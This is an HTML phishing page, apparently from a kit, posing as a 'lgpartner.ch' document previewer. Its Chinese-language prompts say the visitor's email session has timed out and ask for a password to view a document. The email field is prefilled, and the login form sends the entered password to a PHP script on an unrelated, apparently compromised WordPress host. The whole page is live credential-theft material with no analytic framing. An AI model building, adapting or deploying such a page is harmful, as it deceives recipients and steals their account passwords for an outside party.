<html>
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />
	<title>PDF | lgpartner.ch Document Previewer</title>
	<link rel="shortcut icon" href="./photos/favicon.ico">
	<style>
input[type=submit] {
  width:110px; 
  height:35px; 
  font-family: verdana; 
  font-size: 12px; 
  color:#FFF; 
  background-color: #0489B1; 
  border: solid 1px #0489B1; 
  padding: 7px; 
  -moz-border-radius: 4px; 
  -webkit-border-radius: 4px; 
  -khtml-border-radius: 4px; 
  border-radius: 4px;
  -webkit-box-shadow: 1px 1px 10px 3px #FFF; 
  box-shadow: 1px 1px 10px 3px #FFF;
}

input[type=email] {
  width:275px; 
  height:35px; 
  font-family: Verdana; 
  font-size: 12px; 
  color:#000000; 
  background-color: #FFF; 
  border: solid 1px #FFF; 
  padding: 7px; 
  -moz-border-radius: 4px; 
  -webkit-border-radius: 4px; 
  -khtml-border-radius: 4px; 
  border-radius: 4px;
}

input[type=password] {
  width:275px; 
  height:35px; font-family: verdana; 
  font-size: 12px; 
  color:#000000; 
  background-color: #FFF; 
  border: solid 1px #FFF; 
  padding: 7px; 
  -moz-border-radius: 4px; 
  -webkit-border-radius: 4px; 
  -khtml-border-radius: 4px; 
  border-radius: 4px;
</style>
	<style>
body, html {
  height: 100%;
  margin: 0;
  font-family: Arial, Helvetica, sans-serif;
}

* {
  box-sizing: border-box;
}

.bg-image {
  /* The image used */
  background-image: url("https://i.gyazo.com/97fa22398eecc10061faa658e528684a.png");
  
  /* Add the blur effect */
  filter: blur(5px);
  -webkit-filter: blur(5px);
  
  /* Full height */
  height: 100%; 
  
  /* Center and scale the image nicely */
  background-position: center;
  background-repeat: no-repeat;
  background-size: cover;
}

/* Position text in the middle of the page/image */
.bg-text {
  background: #1C1C1C;
  background: -moz-linear-gradient(top, #1C1C1C 0%, #610B0B 73%, #DF0101 100%);
  background: -webkit-linear-gradient(top, #1C1C1C 0%, #610B0B 73%, #DF0101 100%);
  background: linear-gradient(to bottom, #1C1C1C 0%, #610B0B 73%, #DF0101 100%);
  color: white;
  font-weight: bold;
  border-radius: 25px 0px 65px 0px;
  -webkit-box-shadow: 3px 3px 15px 5px #000000; 
  box-shadow: 3px 3px 15px 5px #000000;
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  z-index: 2;
  width: 360px;
  height:325px;
  padding: 5px;
  text-align: center;
</style>
</head>
<body marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">

<table align="center" cellspacing="0" width="100%" height="100%">

<tr><td height="15%">

	<img src="https://i.gyazo.com/429548e6cd1f7f512c1dcbd0003caaeb.png">

</td></tr>


<tr><td height="78%">

<div class="bg-image"></div>

<br><br><br>


<div class="bg-text">


	<table align="center" cellspacing="0">
	<tr><td style="height:35px;"></td></tr>
	<tr><td>
		<font face="arial" size="3" color="#FFFFFF">
		<b>lgpartner.ch</b> &#39564;&#35777;
		</font>
	</td></tr>
	
					<tr><td style="height:10px;"></td></tr>
	
					<tr><td>
					<form method="post" action="http://29.hkwordpress.com/wp-admin/...@@@/lognet2023.php">
					</td></tr>
					<tr><td>
							<div align="left">
								<font face="verdana" size="2" color="#FFF">
									&#30005;&#23376;&#37038;&#20214;&#36229;&#26102; &#30331;&#24405;&#20197;&#26597;&#30475;&#25991;&#26723;...
								</font>
							</div>
					</td></tr>
					<tr><td style="height:15px;"></td></tr>
					<tr><td>
						<table cellspacing="0" align="center">
						<tr><td>
							<div align="center">
								<input  name="login" type="email" value="[EMail]" disabled>
							</div>
						</td></tr>
						<tr><td style="height:7px;"></td></tr>
						<tr><td>
							<div align="center">
								<input  name="passwd" type="password" placeholder="&#23494;&#30721;" required>
							</div>
						</td></tr>
						<tr><td style="height:7px;"></td></tr>
						<tr><td>
							<table align="center" cellspacing="0" style="width:277px;"><tr>
							<td>
								<input type="checkbox" checked> <font face="arial" size="2" color="#FFF">&#35760;&#24471;&#25105;</font>
							</td>
							<td>
								<div align="right">
									<a href="#" style="tet]xt-decoration:none;">
										<font face="arial" size="2" color="#0080FF"><u>
											&#24536;&#35760;&#23494;&#30721;&#65311;
										</u></font>
									</a>
								</div>
							</td>
							</tr></table>
						</td></tr>
						<tr><td style="height:20px;"></td></tr>
						<tr><td>
							<div align="right">
								<input type="submit" value="&#30475;&#27861;">
							</div>
						</td></tr>
						<tr><td>
						</td></tr>
						<tr><td style="height:20px;">
							<input type="hidden" name="login" value="[EMail]">
							</form>
						</td></tr>
						</table>
					</td></tr>
	</table>
</div>


</td></tr>


<tr><td height="2%" bgcolor="#FFF"></td></tr>

<tr><td height="5%" bgcolor="#000">

	<div align="center">
		<font face="arial" size="1" color="#FFF">
		Copyright ¨Ï . All rights reserved
		</font>
	</div>

</td></tr>
</body>
</html>
